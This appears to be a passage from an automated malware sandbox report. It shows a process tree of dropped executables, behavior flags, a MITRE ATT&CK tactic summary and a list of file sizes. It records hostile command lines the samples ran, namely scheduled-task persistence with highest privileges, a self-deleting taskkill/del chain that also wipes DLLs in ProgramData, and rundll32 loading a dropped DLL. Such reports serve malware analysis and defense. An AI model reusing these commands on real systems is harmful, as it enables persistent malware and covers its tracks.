C:\Users\Admin\Pictures\Adobe Films\d3AMh7RrYP1XgER3nYdWgVrD.exe"C:\Users\Admin\Pictures\Adobe Films\d3AMh7RrYP1XgER3nYdWgVrD.exe"2⤵
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\Pictures\Adobe Films\H6UM5D_oAJb1wY44F0H9W53a.exe"C:\Users\Admin\Pictures\Adobe Films\H6UM5D_oAJb1wY44F0H9W53a.exe"2⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\hschgIT73zIyo43yY5y_5zDy.exe"C:\Users\Admin\Pictures\Adobe Films\hschgIT73zIyo43yY5y_5zDy.exe"2⤵
- Loads dropped DLL
-
-
C:\Users\Admin\Pictures\Adobe Films\xcLVIwmxi_ZLJsepaVLcueHv.exe"C:\Users\Admin\Pictures\Adobe Films\xcLVIwmxi_ZLJsepaVLcueHv.exe"2⤵
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im xcLVIwmxi_ZLJsepaVLcueHv.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\xcLVIwmxi_ZLJsepaVLcueHv.exe" & del C:\ProgramData\*.dll & exit3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im xcLVIwmxi_ZLJsepaVLcueHv.exe /f4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\CMCX11vCmko9R4RXJMdgUVL4.exe"C:\Users\Admin\Pictures\Adobe Films\CMCX11vCmko9R4RXJMdgUVL4.exe"2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\AppData\Local\Temp\7zS8A101816\Sun03f5d51697d04.exeSun03f5d51697d04.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-6VGKL.tmp\Sun03f5d51697d04.tmp"C:\Users\Admin\AppData\Local\Temp\is-6VGKL.tmp\Sun03f5d51697d04.tmp" /SL5="$6007C,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS8A101816\Sun03f5d51697d04.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS8A101816\Sun03f5d51697d04.exe"C:\Users\Admin\AppData\Local\Temp\7zS8A101816\Sun03f5d51697d04.exe" /SILENT3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-1UPBS.tmp\Sun03f5d51697d04.tmp"C:\Users\Admin\AppData\Local\Temp\is-1UPBS.tmp\Sun03f5d51697d04.tmp" /SL5="$401D8,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS8A101816\Sun03f5d51697d04.exe" /SILENT4⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-ASRMA.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-ASRMA.tmp\postback.exe" ss15⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
-
-
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵
-
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exeC:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe /update /peruser /childprocess1⤵
- Modifies system executable filetype association
- Adds Run key to start application
- Modifies Internet Explorer settings
- Modifies registry class
-
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.196.0921.0007\FileSyncConfig.exe"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.196.0921.0007\FileSyncConfig.exe"2⤵
- Modifies registry class
-
-
C:\Windows\system32\compattelrunner.exeC:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW1⤵
Network
MITRE ATT&CK Enterprise v6
Persistence
Change Default File Association
1Modify Existing Service
1Registry Run Keys / Startup Folder
3Scheduled Task
1Defense Evasion
Disabling Security Tools
1Install Root Certificate
1Modify Registry
6Virtualization/Sandbox Evasion
1Web Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
8KB
-
Filesize
80KB
-
Filesize
456KB
-
Filesize
100KB
-
Filesize
1.5MB
-
Filesize
100KB
-
Filesize
572KB
-
Filesize
572KB
-
Filesize
572KB
-
Filesize
1.5MB
-
Filesize
1.5MB
-
Filesize
1.5MB
-
Filesize
152KB
-
Filesize
100KB
-
Filesize
100KB
-
Filesize
456KB
-
Filesize
456KB
-
Filesize
696KB
-
Filesize
696KB
-
Filesize
456KB
-
Filesize
80KB
-
Filesize
456KB
-
Filesize
296KB
-
Filesize
352KB
-
Filesize
164KB
-
Filesize
456KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
856KB
-
Filesize
39.7MB
-
Filesize
456KB
-
Filesize
1.6MB
-
Filesize
1.3MB
-
Filesize
172KB
-
Filesize
4KB
-
Filesize
1.6MB
-
Filesize
268KB
-
Filesize
39.4MB
-
Filesize
136KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
456KB
-
Filesize
456KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
88KB
-
Filesize
456KB
-
Filesize
1.0MB
-
Filesize
372KB
-
Filesize
456KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
456KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
32KB
-
Filesize
220KB
-
Filesize
36KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.0MB
-
Filesize
128KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
308KB
-
Filesize
456KB
-
Filesize
1.6MB